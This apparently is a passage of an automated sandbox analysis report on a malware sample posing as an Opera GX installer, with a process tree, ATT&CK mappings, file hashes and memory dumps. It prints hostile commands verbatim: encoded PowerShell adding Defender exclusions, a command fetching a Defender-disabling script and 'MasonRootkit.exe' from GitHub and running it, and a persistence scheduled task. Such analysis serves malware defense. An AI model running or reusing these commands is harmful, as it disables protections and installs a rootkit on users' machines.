        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        26⤵
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        26⤵
        
        PID:6168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        27⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        27⤵
        
        PID:6380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        28⤵
        
        PID:6528
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        28⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        29⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        29⤵
        
        PID:6844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        30⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        30⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        31⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        31⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        32⤵
        
        PID:6536
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        32⤵
        
        PID:5812
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        33⤵
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        33⤵
        
        PID:7004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        34⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        34⤵
        
        PID:4936
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAbgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYwB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAegBpACMAPgA="
        35⤵
        
        PID:6968
        
        C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\OperaGXSetup.exe"
        35⤵
        
        PID:6220
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        35⤵
        
        PID:6592
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        34⤵
        
        PID:4920
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        33⤵
        
        PID:6848
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        32⤵
        
        PID:6720
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        31⤵
        
        PID:6412
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        30⤵
        
        PID:7112
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        29⤵
        
        PID:6860
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        28⤵
        
        PID:6616
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        27⤵
        
        PID:6388
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        26⤵
        
        PID:6176
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        25⤵
        
        PID:6004
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        24⤵
        
        PID:5900
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        23⤵
        
        PID:5692
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        22⤵
        
        PID:2648
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        21⤵
        
        PID:5908
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        20⤵
        
        PID:1812
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        19⤵
        
        PID:5956
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        18⤵
        
        PID:5652
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        17⤵
        
        PID:5452
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        16⤵
        
        PID:5132
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        15⤵
        
        PID:440
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        14⤵
        
        PID:1072
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        13⤵
        
        PID:3732
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        12⤵
        
        PID:812
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        11⤵
        
        PID:2348
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        10⤵
        
        PID:3156
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        9⤵
        
        PID:2856
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        8⤵
        
        PID:4092
        
        C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        7⤵
        
        PID:2392
      - C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        6⤵
        
        PID:812
    - - C:\Windows\Credential Guard & VBS Key Isolation.exe
        
        "C:\Windows\Credential Guard & VBS Key Isolation.exe"
        5⤵
        
        PID:3672
  - - C:\Windows\Credential Guard & VBS Key Isolation.exe
      "C:\Windows\Credential Guard & VBS Key Isolation.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4536
- - C:\Windows\Credential Guard & VBS Key Isolation.exe
    "C:\Windows\Credential Guard & VBS Key Isolation.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- C:\Windows\Credential Guard & VBS Key Isolation.exe
  "C:\Windows\Credential Guard & VBS Key Isolation.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3448
  - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
      "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
      4⤵
      PID:1164
    - - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        5⤵
        
        PID:440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE0BB.tmp.bat""
        5⤵
        
        PID:4404
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:5972
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Credential Guard & VBS Key Isolation" /tr "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5280

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c9c975fc-1a01-4758-aec4-0cc9c4b9ca67}
1⤵
PID:5664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MasonRootkit.exe

Filesize
596KB

MD5
bb2fd6c1b233fd2f08a6a43ef860bcb6

SHA1
1cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04

SHA256
8c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce

SHA512
2ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Credential Guard & VBS Key Isolation.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MasonRootkit.exe.log

Filesize
1KB

MD5
3982d6d16fd43ae609fd495bb33433a2

SHA1
6c33cd681fdfd9a844a3128602455a768e348765

SHA256
9a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9

SHA512
4b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
37663d2d0cf3d5a19d0197ed39b31c1b

SHA1
41cb890dff7a624148ffd518d284258e65d20b5c

SHA256
5846f9ae8fd92f14c14337d30856f66c23c160cb32f8d2b708674f963dd12fef

SHA512
92e71ee086ed836d7303d641bcba7b9903271af5a9b289e8c1ceb98ab3a338e3030db3978de23721c72a6322f5b691563a3597e197d3115b7a608b578f648489

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6b759b69b6134c861872668d338a7d29

SHA1
f924cdc9ac7a8ffeec4e68854e6051145711b1ea

SHA256
baeb176be0daa94dc89579857f03b729065369be6fae26af993eac2bad89b87c

SHA512
793d67a755a14f906497d6930d06656dd3811ec6d3e452dbcca55e32d98d83f2d29a8d2c1aee2158a1f1dd5d8bb024bfde3c538a9abb7555d5e273a430c2b0f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe

Filesize
612KB

MD5
5e1eb1a67d40ccae40dee2a037ca6c64

SHA1
786b54d3d451ea40faeeb20fd30a38744862eeb5

SHA256
80e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f

SHA512
0484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0mnrxfr.l3d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE0BB.tmp.bat

Filesize
164B

MD5
ae7b13747bd19e0c7793c899e35f6f03

SHA1
449d3313760417c76ec8e65605b68e9300839da1

SHA256
78cbd2dfa1dea272f02fddbe9b0b4b0c7ddb4d9a79882398075e752c805678ce

SHA512
096dd6da14868836e47b97f49b3c451443455f59bd4e2d16387d5f2e8fcfe9416f097f4faa8c4d545d6b8cca262df231a8ea790e21347663a6fb6bd9bde6764b

Download Submit
C:\Windows\Credential Guard & VBS Key Isolation.exe

Filesize
55KB

MD5
dac20ddb2cfb3cb89ce5bcd907c796df

SHA1
84ec40d9a683ed62a25f8e1e570b0a2ee3987af0

SHA256
9a727d5cfc4c67cb0d3c0f8195087042fd04b83bb29cbe0c0439a4094a2adfc7

SHA512
5a3199f76bc18eb20a1e9e7d0bdbadbff3deaa06ec00b3aee33360f1497cc22ae0bc1a125aeaadcef1647c5f03cb386bfbc62375ca5e70ac57c01168043c8762

Download Submit
memory/440-353-0x00007FFDADAF0000-0x00007FFDADCE5000-memory.dmp

Filesize
2.0MB

Download
memory/440-352-0x00000193BD050000-0x00000193BD0EA000-memory.dmp

Filesize
616KB

Download
memory/440-354-0x00007FFDAC680000-0x00007FFDAC73E000-memory.dmp

Filesize
760KB

Download
memory/836-381-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/1164-273-0x00000000008F0000-0x0000000000990000-memory.dmp

Filesize
640KB

Download
memory/1164-274-0x0000000002A70000-0x0000000002B08000-memory.dmp

Filesize
608KB

Download
memory/1296-329-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/1912-133-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/2012-441-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/2316-241-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/2328-370-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/2864-198-0x0000000007A30000-0x0000000007A38000-memory.dmp

Filesize
32KB

Download
memory/2864-118-0x0000000007D30000-0x00000000083AA000-memory.dmp

Filesize
6.5MB

Download
memory/2864-132-0x00000000078F0000-0x0000000007901000-memory.dmp

Filesize
68KB

Download
memory/2864-120-0x0000000007760000-0x000000000776A000-memory.dmp

Filesize
40KB

Download
memory/2864-16-0x0000000005590000-0x0000000005BB8000-memory.dmp

Filesize
6.2MB

Download
memory/2864-14-0x0000000004DF0000-0x0000000004E26000-memory.dmp

Filesize
216KB

Download
memory/2864-26-0x0000000005DB0000-0x0000000006104000-memory.dmp

Filesize
3.3MB

Download
memory/2864-175-0x0000000007950000-0x000000000795E000-memory.dmp

Filesize
56KB

Download
memory/2864-177-0x0000000007960000-0x0000000007974000-memory.dmp

Filesize
80KB

Download
memory/2864-50-0x00000000063C0000-0x00000000063DE000-memory.dmp

Filesize
120KB

Download
memory/2864-197-0x0000000007A40000-0x0000000007A5A000-memory.dmp

Filesize
104KB

Download
memory/2864-121-0x0000000007980000-0x0000000007A16000-memory.dmp

Filesize
600KB

Download
memory/2864-51-0x00000000069C0000-0x0000000006A0C000-memory.dmp

Filesize
304KB

Download
memory/2864-83-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/2864-229-0x000000007389E000-0x000000007389F000-memory.dmp

Filesize
4KB

Download
memory/2864-17-0x00000000052F0000-0x0000000005312000-memory.dmp

Filesize
136KB

Download
memory/2864-107-0x00000000075C0000-0x0000000007663000-memory.dmp

Filesize
652KB

Download
memory/2864-11-0x000000007389E000-0x000000007389F000-memory.dmp

Filesize
4KB

Download
memory/3012-199-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/3232-178-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/3284-219-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/3380-411-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/3448-101-0x000001D6D5B20000-0x000001D6D5B42000-memory.dmp

Filesize
136KB

Download
memory/3448-174-0x000001D6D8940000-0x000001D6D8E68000-memory.dmp

Filesize
5.2MB

Download
memory/3448-173-0x000001D6D8240000-0x000001D6D8402000-memory.dmp

Filesize
1.8MB

Download
memory/3528-162-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/3672-307-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/3840-286-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/4444-12-0x00007FFD8F743000-0x00007FFD8F745000-memory.dmp

Filesize
8KB

Download
memory/4444-13-0x0000000000EF0000-0x0000000000F04000-memory.dmp

Filesize
80KB

Download
memory/5024-119-0x0000000007900000-0x000000000791A000-memory.dmp

Filesize
104KB

Download
memory/5024-20-0x0000000005DA0000-0x0000000005E06000-memory.dmp

Filesize
408KB

Download
memory/5024-19-0x0000000005690000-0x00000000056F6000-memory.dmp

Filesize
408KB

Download
memory/5024-95-0x00000000075B0000-0x00000000075CE000-memory.dmp

Filesize
120KB

Download
memory/5024-76-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/5024-75-0x0000000007570000-0x00000000075A2000-memory.dmp

Filesize
200KB

Download
memory/5360-451-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/5636-477-0x00000000711F0000-0x000000007123C000-memory.dmp

Filesize
304KB

Download
memory/5664-365-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/5664-367-0x0000000140000000-0x00000001401A1000-memory.dmp

Filesize
1.6MB

Download
memory/5664-368-0x00007FFDADAF0000-0x00007FFDADCE5000-memory.dmp

Filesize
2.0MB

Download
memory/5664-369-0x00007FFDAC680000-0x00007FFDAC73E000-memory.dmp

Filesize
760KB

Download